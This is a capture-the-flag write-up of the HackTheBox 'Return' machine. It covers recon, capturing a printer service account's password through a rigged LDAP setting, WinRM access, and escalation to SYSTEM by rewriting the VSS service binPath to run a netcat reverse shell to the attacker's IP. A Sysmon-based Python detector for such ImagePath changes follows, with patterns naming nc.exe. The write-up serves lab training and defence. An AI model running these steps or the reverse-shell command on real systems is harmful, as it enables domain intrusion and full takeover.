title: HackTheBox-Return
author: Mosaic Theory
layout: true
categories: 漏洞实验
tags:
- 打靶日记
To be both a speaker of words and a doer of deeds.
HackTheBox-Return
Recon:
```
Nmap scan report for return.htb (10.10.11.108)
Host is up (0.36s latency).
Not shown: 65509 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: HTB Printer Admin Panel
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-05-15 14:51:01Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
49694/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 18m34s
| smb2-time:
|   date: 2022-05-15T14:52:00
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 857.68 seconds
```
Port 53:
```
>> dig axfr @10.10.11.108 return.local

; <<>> DiG 9.18.1-1-Debian <<>> axfr @10.10.11.108 return.local
; (1 server found)
;; global options: +cmd
; Transfer failed.
```
Port 80:
I tried changing the password. There was no success message and no error returned either. I entered the five-character string admin, but after submitting it showed as seven asterisks. Either way, it is a web admin panel written in PHP:
```
POST /settings.php HTTP/1.1
Host: return.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Origin: http://return.htb
DNT: 1
Connection: close
Referer: http://return.htb/settings.php
Upgrade-Insecure-Requests: 1

ip=printer.return.local
```
The password I submit never appears in the request at all. I can try changing the IP to my own address and then start capturing:
```
>> sudo responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.1.0

  Author: Laurent Gaffie ([email protected])
  To kill this script hit CTRL-C

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.6]
    Responder IPv6             [dead:beef:4::1004]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Listening for events...
```
Port 139,445:
```
>> crackmapexec smb 10.10.11.108 --shares -u svc-printer -p '1edFg43012!!'
SMB    10.10.11.108  445  PRINTER  [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB    10.10.11.108  445  PRINTER  [+] return.local\svc-printer:1edFg43012!!
SMB    10.10.11.108  445  PRINTER  [+] Enumerated shares
SMB    10.10.11.108  445  PRINTER  Share     Permissions  Remark
SMB    10.10.11.108  445  PRINTER  -----     -----------  ------
SMB    10.10.11.108  445  PRINTER  ADMIN$    READ         Remote Admin
SMB    10.10.11.108  445  PRINTER  C$        READ,WRITE   Default share
SMB    10.10.11.108  445  PRINTER  IPC$      READ         Remote IPC
SMB    10.10.11.108  445  PRINTER  NETLOGON  READ         Logon server share
SMB    10.10.11.108  445  PRINTER  SYSVOL    READ         Logon server share
```
All of these are the default shares.
Port 135:
```
>> rpcclient //10.10.11.108/ -U svc-printer
Cannot connect to server.  Error was NT_STATUS_UNSUCCESSFUL
```
RPC refuses the connection.
Port 5985:
```
>> crackmapexec winrm 10.10.11.108 -u svc-printer -p '1edFg43012!!'
SMB    10.10.11.108  5985  PRINTER  [*] Windows 10.0 Build 17763 (name:PRINTER) (domain:return.local)
HTTP   10.10.11.108  5985  PRINTER  [*] http://10.10.11.108:5985/wsman
WINRM  10.10.11.108  5985  PRINTER  [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)
```
```
>> evil-winrm -i 10.10.11.108 -u svc-printer -p '1edFg43012!!'

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-printer\Documents> cd ~
*Evil-WinRM* PS C:\Users\svc-printer> ls

    Directory: C:\Users\svc-printer

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        5/26/2021   2:05 AM                Desktop
d-r---        5/26/2021   1:51 AM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos

*Evil-WinRM* PS C:\Users\svc-printer> cd Desktop
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> ls

    Directory: C:\Users\svc-printer\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        5/15/2022   8:29 AM             34 user.txt

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> type user.txt
fe9...............................
```
This account has very high privileges: it can load a malicious driver, or back up files and dump the hashes:
```
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeLoadDriverPrivilege         Load and unload device drivers      Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled
*Evil-WinRM* PS C:\Users\svc-printer\Desktop>
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators                   Alias            S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288
```
Creating a malicious service is enough to get SYSTEM privileges easily:
```
*Evil-WinRM* PS C:\Users\svc-printer\Documents> CD C:\programdata
*Evil-WinRM* PS C:\programdata> upload /home/mosaictheory/Tools/n
/home/mosaictheory/Tools/nc  /home/mosaictheory/Tools/nmapscripts.list
*Evil-WinRM* PS C:\programdata> upload /home/mosaictheory/Tools/nc/nc
/home/mosaictheory/Tools/nc/nc.exe  /home/mosaictheory/Tools/nc/nc64.exe
*Evil-WinRM* PS C:\programdata> upload /home/mosaictheory/Tools/nc/nc64.exe
Info: Uploading /home/mosaictheory/Tools/nc/nc64.exe to C:\programdata\nc64.exe

Data: 60360 bytes of 60360 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\programdata> sc.exe config VSS binpath="C:\windows\system32\cmd.exe /c C:\programdata\nc64.exe -e cmd 10.10.16.6 9001"
[SC] ChangeServiceConfig SUCCESS
*Evil-WinRM* PS C:\programdata> sc.exe start VSS
```
```
C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
4f6....................................
```
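From the defender's side, the binPath rewrite above is exactly what a Sysmon registry rule should surface: Sysmon Event ID 13 (RegistryEvent, Value Set) fires when a service's ImagePath value under HKLM\System\CurrentControlSet\Services is changed. The following Python is an added example, not code from the writeup, and runs over constructed Sysmon-style records; the field names follow Sysmon's event data, while the user, paths and IP in the samples are made up to mirror the VSS change on this box.

```python
import re

# Constructed Sysmon Event ID 13 (RegistryEvent, Value Set) records modelled on the VSS
# binPath change in the writeup; field names follow Sysmon, the values are made up.
SAMPLE_EVENTS = [
    {"EventID": 13, "User": "RETURN\\svc-printer",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\VSS\\ImagePath",
     "Details": "C:\\windows\\system32\\cmd.exe /c C:\\programdata\\nc64.exe -e cmd 10.10.16.6 9001"},
    {"EventID": 13, "User": "NT AUTHORITY\\SYSTEM",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\Spooler\\ImagePath",
     "Details": "C:\\Windows\\System32\\spoolsv.exe"},
    {"EventID": 13, "User": "RETURN\\svc-printer",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\VSS\\Start",
     "Details": "DWORD (0x00000003)"},
    {"EventID": 13, "User": "RETURN\\svc-printer",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\VSS\\ImagePath",
     "Details": "C:\\programdata\\updater.exe"},
]

IMAGEPATH_KEY = re.compile(r"^HKLM\\System\\CurrentControlSet\\Services\\([^\\]+)\\ImagePath$", re.I)
# Where a legitimately installed service binary is expected to live.
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                "c:\\program files\\", "c:\\program files (x86)\\")
# Interpreter wrappers and reverse-shell tooling never belong in a service ImagePath.
SUSPICIOUS_CMD = re.compile(r"cmd\.exe\s+/c|powershell|\s-e\s+cmd\b|\bnc(64)?\.exe", re.I)

def first_executable(image_path):
    """Executable part of an ImagePath (quoted path or first token), lower-cased."""
    s = image_path.strip()
    return (s[1:s.find('"', 1)] if s.startswith('"') else (s.split() or [""])[0]).lower()

def check_imagepath_change(event):
    """(service, reason) if the event rewrites a service ImagePath suspiciously, else None."""
    m = IMAGEPATH_KEY.match(event.get("TargetObject", ""))
    if event.get("EventID") != 13 or not m:
        return None
    service, details = m.group(1), event.get("Details", "")
    if SUSPICIOUS_CMD.search(details):
        return service, "shell wrapper or reverse-shell tool in ImagePath"
    if not first_executable(details).startswith(TRUSTED_DIRS):
        return service, "service binary outside trusted directories"
    return None

def scan(events):
    """All (service, user, reason) findings; an empty list means nothing suspicious."""
    findings = []
    for ev in events:
        hit = check_imagepath_change(ev)
        if hit:
            findings.append((hit[0], ev["User"], hit[1]))
    return findings
```

Pairing the finding with the acting user is the useful part: a member of Server Operators or Print Operators rewriting any service ImagePath is worth an alert on its own, whatever the new path looks like.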
Originally published on the WeChat public account 老鑫安全: HackTheBox-Return